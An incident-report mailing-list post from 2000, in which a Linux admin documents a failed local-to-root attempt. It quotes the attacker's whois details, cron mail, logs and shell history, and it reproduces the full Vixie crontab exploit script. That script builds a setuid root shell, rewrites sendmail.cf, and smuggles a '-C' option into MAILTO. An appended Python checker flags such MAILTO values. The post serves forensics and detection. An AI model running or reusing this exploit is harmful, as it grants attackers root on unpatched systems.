Howdy. Got attacked but a 'local user -> root' exploit
failed. Here're the details:
As soon as I saw the crond e-mail I su'ed in and
ran a safe'ed[*] copy of shutdown -h now on the machine.
Not needed(?).
Machine runs Linux, 2.2.13, with patched RH6.1 and latest
security rpm's installed. Not too much enabled.
Cracker came from: (they're getting a copy of this BTW)
----------------- ----------------- -----------------
Name: mel-0212-234.ports.iprimus.net.au
Address: 203.134.25.234
domain: iprimus.net.au
descr: iprimus (ACN: VICB1429660R)
Level 3 55 king st
Melbourne Victoria 3000
admin-c: TP383-AU
tech-c: TP383-AU
zone-c: TP383-AU
nserver: ns0.primus.com.au
nserver: ns1.primus.com.au
notify: dbmon_at_connect.com.au
changed: net-au-admin_at_connect.com.au 19991221
source: CCAIR
whois -h whois.aunic.net -p 43 -s AUNIC -T p
----------------- ----------------- -----------------
Mail message from cron: (recreation, snipped)
----------------- ----------------- -----------------
Date: Sat, 8 Jan 2000 21:59:00 -0500
Subject: Cron <filipg_at_host> ls
X-Cron-Env: <MAILTO=-C/tmp/sendmail.cf filipg>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/home/filipg>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=filipg>
Desktop
GROUPS.gz
News
bin
crond.sh
from_geoclub
lynx_bookmarks.html
mail
private
public
public_html
wwwis
----------------- ----------------- -----------------
Home of user contains a file:
----------------- ----------------- -----------------
-rwxrwxr-x 1 filipg filipg 2103 Jan 8 05:40 /home/filipg/crond.sh
----------------- ----------------- -----------------
Listing of exploit:
----------------- ----------------- -----------------
#!/bin/sh
# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
echo
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo
echo make shell
echo
cat > /tmp/sh.c << EOF
#include<unistd.h>
#include<stdlib.h>
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c
echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh
echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3
echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile
echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait
echo execute shell
echo
/tmp/sh
echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------- ----------------- -----------------
Diff of fake sendmail.cf vs original:
----------------- ----------------- -----------------
/home/filipg> diff /tmp/sendmail.cf /etc/sendmail.cf
1072,1073c1072,1073
< Mprocmail, P=/tmp/makesh, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,
< A=makesh -Y -m $h $f $u
---
> Mprocmail, P=/usr/bin/procmail, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,
> A=procmail -Y -m $h $f $u
1174c1174
< Mlocal, P=/tmp/makesh, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
---
> Mlocal, P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
1176c1176
< A=makesh -Y -a $h -d $u
---
> A=procmail -Y -a $h -d $u
----------------- ----------------- -----------------
/tmp/cronfile has:
----------------- ----------------- -----------------
MAILTO=-C/tmp/sendmail.cf filipg
* * * * * ls
----------------- ----------------- -----------------
I did a search for 'it' and found ??? (old, c):
----------------- ----------------- -----------------
http://www.insecure.org/sploits_linux.html
----------------- ----------------- -----------------
Shell file in /tmp:
----------------- ----------------- -----------------
-rwxrwxr-x 1 filipg filipg 11923 Jan 8 21:58 sh
/tmp/sh: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
----------------- ----------------- -----------------
Entries from /var/log/secure:
----------------- ----------------- -----------------
[these are old.. that account was shut down when I complained]
[Don't think (???) it's related:
http://www.allwhois.com/cgi-bin/allwhois3.cgi?dn=optusnet.com.au]
Dec 28 04:25:50 host in.telnetd[5174]: connect from wdcax6-030.dialup.optusnet.com.au
Dec 28 04:25:52 host in.ftpd[5176]: connect from wdcax6-030.dialup.optusnet.com.au
Dec 28 04:26:16 host in.telnetd[5177]: connect from wdcax6-030.dialup.optusnet.com.au
[...]
Jan 8 05:38:48 host in.telnetd[10430]: connect from mel-0212-234.ports.iprimus.net.au
Jan 8 05:39:04 host login: LOGIN ON 0 BY filipg FROM mel-0212-234.ports.iprimus.net.au
----------------- ----------------- -----------------
Got in through bash... but smart enough to switch to tcsh:
(from .bash_history)
----------------- ----------------- -----------------
dir
ls -asF
source .tcshrc
tcsh
tcsh
./crond.sh
dir
dir
whoami
----------------- ----------------- -----------------
Here's a snippet from /var/log/cron:
----------------- ----------------- -----------------
[...]
root (01/08-05:40:00-10470) CMD ( /sbin/rmmod -as)
filipg (01/08-05:40:38-10493) REPLACE (filipg)
CRON (01/08-05:41:00-10499) error (bad mailto)
filipg (01/08-05:41:00-10500) CMD (ls)
filipg (01/08-05:41:19-10525) REPLACE (filipg)
filipg (01/08-05:42:01-486) RELOAD (cron/filipg)
CRON (01/08-05:42:01-10531) error (bad mailto)
filipg (01/08-05:42:01-10532) CMD (ls)
CRON (01/08-05:43:00-10536) error (bad mailto)
filipg (01/08-05:43:00-10537) CMD (ls)
filipg (01/08-05:43:58-10541) REPLACE (filipg)
filipg (01/08-05:43:58-10543) REPLACE (filipg)
filipg (01/08-05:44:00-486) RELOAD (cron/filipg)
root (01/08-05:50:00-10545) CMD ( /sbin/rmmod -as)
[...]
----------------- ----------------- -----------------
Of *COURSE*, I had fw logging disabled at the time.
I'm still learning how all this works... Should do it
faster! GUDDAM Murphy's law.
It failed... I'm pretty sure (I am checking signatures now, so
far so good.) Latest fixes applied and running just the
bare-essentials+httpd.
Since my password is good, I think there is a sniffer on local net.
The only places I log in to that machine from are dept machines and
the console. I trust the console... can't throw the dept very
far, FYI.
Damn. Wonder if our lovely CIS has a clue. [yawn]
Cheers,
Filip G.
[*] crypted tar of key binaries... stowed for when
quano hits slowly revolving air vanes and I'm not at
the console. I know you can find problems with dis :)
Received on Jan 10 2000
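The two artifacts that gave this attempt away were the crontab with a MAILTO that starts with "-" (a sendmail option smuggled in where an address belongs) and the "error (bad mailto)" lines the patched cron wrote to /var/log/cron. The checker below is an added example, not part of the original message or of any cron package; it scans constructed copies of both artifacts, modelled on the excerpts above, and reports the findings a defender would want to alert on.

```python
import re

# Constructed sample inputs, modelled on the /tmp/cronfile and /var/log/cron excerpts above.
SAMPLE_CRONTAB = """MAILTO=-C/tmp/sendmail.cf filipg
* * * * * ls
"""
SAMPLE_CRON_LOG = """filipg (01/08-05:40:38-10493) REPLACE (filipg)
CRON (01/08-05:41:00-10499) error (bad mailto)
filipg (01/08-05:41:00-10500) CMD (ls)
root (01/08-05:50:00-10545) CMD ( /sbin/rmmod -as)
"""

# Crontab environment assignment: NAME=value (quotes optional, trailing blanks ignored).
ENV_RE = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$')
# Vixie cron log line: "<user> (<MM/DD-HH:MM:SS-pid>) <EVENT> (<detail>)".
LOG_RE = re.compile(r'^(\S+) \((\S+)\) (\w+) \((.*)\)$')


def suspicious_mailto(crontab_text):
    """Return (lineno, value) for each MAILTO whose value cannot be a plain mail address."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        m = ENV_RE.match(line)
        if not m or m.group(1) != 'MAILTO':
            continue
        value = m.group(2).strip('"\'')
        # A recipient never begins with '-' or contains whitespace; either shape means the
        # value is being handed to sendmail's command line as options, not used as an address.
        if value.startswith('-') or any(c.isspace() for c in value):
            findings.append((lineno, value))
    return findings


def cron_log_findings(log_text):
    """Collect 'bad mailto' rejections and crontab REPLACE events (who installed what, when)."""
    findings = {'bad_mailto': [], 'crontab_replaced': []}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        user, stamp, event, detail = m.groups()
        when = stamp.rsplit('-', 1)[0]          # drop the trailing pid
        if user == 'CRON' and event == 'error' and detail == 'bad mailto':
            findings['bad_mailto'].append(when)
        elif event == 'REPLACE':
            findings['crontab_replaced'].append((when, user))
    return findings
```

Correlating a REPLACE by a user with a "bad mailto" error at the next minute boundary, as in the log above, is the pattern worth alerting on.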